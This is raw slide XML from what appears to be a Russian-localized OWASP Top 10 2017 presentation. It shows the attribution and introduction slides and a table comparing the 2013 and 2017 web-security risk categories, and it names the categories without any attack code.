                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Attribution</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ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="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ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>As there are more contributors than space here, we have created a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>dedicated page </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin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p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin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p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin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ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Acknowledgements</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>’ page. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="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В</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Введение</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2437593199"/>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ru-RU" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Что изменилось в 2017 году с 2013 года?</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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="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p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Over the last few years, the fundamental technology and architecture of applications has changed significantly:</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ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Microservices written in node.js and Spring Boot are replacing traditional monolithic applications. Microservices come with their own security challenges including establishing trust between microservices,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p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="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ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="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p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>New issues, supported by data:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A4:2017-XML External Entities (XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>is a new category primarily supported by </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>source code analysis security testing tools</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (SAST)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> data sets. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>New issues, supported by the community:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="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p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017-Insecure Deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, which permits remote code execution or sensitive object manipulation on affected platforms.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A10:2017-Insufficient Logging and Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="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p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Merged or retired, but not forgotten:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4-Insecure Direct Object References </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7-Missing Function Level Access Control </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>merged into </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A5:2017-Broken Access Control</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cross-Site Request Forgery (CSRF)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> as many frameworks include </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>CSRF defenses</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="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ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10-Unvalidated Redirects and Forwards</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="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rtl="0">
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pP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071859492"/>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204">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ct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ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a: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b="1" baseline="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ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a: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A1 – Injection</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A1:2017-Injection</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A2 – Broken Authentication and Session Management</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A2:2017-Broken Authentication </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A3 – Cross-Site Scripting (XSS)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A3:2017-Sensitive Data Exposure</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A4 – Insecure Direct Object References </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Merged+A7]</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ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML External Entities (XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans"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A5 – Security Misconfiguration</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A5:2017-Broken Access Control </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[Merged]</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A6 – Sensitive Data Exposure</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A6:2017-Security Misconfiguration</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ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>–</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Missing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Function</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Level</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Access</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Contr </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
